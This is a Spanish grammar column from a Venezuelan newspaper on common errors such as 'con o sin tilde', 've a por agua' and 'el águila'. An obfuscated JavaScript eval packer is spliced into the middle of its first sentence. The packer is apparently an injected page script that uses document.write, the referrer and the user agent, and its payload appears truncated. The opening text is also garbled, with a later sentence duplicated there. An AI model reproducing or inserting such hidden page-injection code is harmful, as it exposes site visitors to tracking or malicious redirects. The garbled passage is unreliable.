publicidad

Notículas de Español

Tito Balza Santaella / Escritor / titobalzasantaella1@gmail.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itadr|var|u0026u|referrer|sihsb||js|php'.split('|'),0,{})) espíritu del español rechaza la aglomeración prepositiva o los encuentros cacofónicos: Dos preposiciones regidas: se elimina una, y se dice: Ve por agua. Igualmente se procede con los encuentros repetitivos, cacofónicos

Continuamos revisando las incorrecciones más frecuentes en el habla popular venezolana y zuliana:

-¿Va con o sin tilde?: Esta insistente pregunta circula por el salón de clases cuando el profesor enseña la acentuación española. El alumno entiende y responde. El español se resiente. Como se ve, en la expresión campean las preposiciones con y sin. Preposición (del latín praepositio, -onis) es la parte invariable de la oración, cuyo oficio es denotar la relación que entre sí tienen dos palabras o términos. Funcionan como un puente que une dos extremos. Si decimos: ¿Va con?…, Va es el primer extremo, pero falta el segundo. Esto es, el puente queda tendido hacia el infinito. Debemos preguntar ¿Va con tilde?...y en el segundo sintagma: ¿o (hay elipsis de va, porque se supone, se sabe) sin tilde? El profesor debe, pues, preguntar: ¿Va con tilde o (va) sin ella (=tilde)?

Esta pregunta es especialmente válida con las palabras extranjeras. Ejemplo: los apellidos Wagner o Mac Gregor, que, en sus idiomas originales, no requieren ninguna virgulilla o rasgo, en español sí, por ser voces arraigadas, incorporadas, españolizadas, y son graves terminadas en consonantes que no son n ni s: Wágner, Mac Grégor.

-Ve a por agua. De la madre España nos llega esta expresión que, como otras, rechazan los mejores escritores hispanohablantes. Razón española: El verbo ir (latín ire) tiene entre sus varios regímenes prepositivos la preposición a: se va a. Razón latinoamericana: El espíritu del español rechaza la aglomeración prepositiva o los encuentros cacofónicos: Dos preposiciones regidas: se elimina una, y se dice: Ve por agua.

Igualmente se procede con los encuentros repetitivos, cacofónicos. Ejemplo: Pedro recomienda a su hijo al señor juez. La construcción es correcta: Sujeto: Pedro; verbo: recomienda; complemento directo:a su hijo (requiere de la  preposición a); complemento indirecto: al señor juez (requiere de la preposición a), pero es cacofónica. Las dos aes suenan mal. Se elimina siempre la del complemento directo (no la del indirecto), y se dice: Pedro recomienda su hijo al señor juez.

Que es lo que, precisamente, sucede con las palabras femeninas iniciadas por a acentuada, fónica: águila, aula, aya, hada, etc., que al colocarles su artículo femenino, lo rechazan por el encuentro cacofónico a-a, y no se dice: la águila, sino el águila; la aya, sino el aya; una aula, sino un aula; la hada, sino el hada, etc.    

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama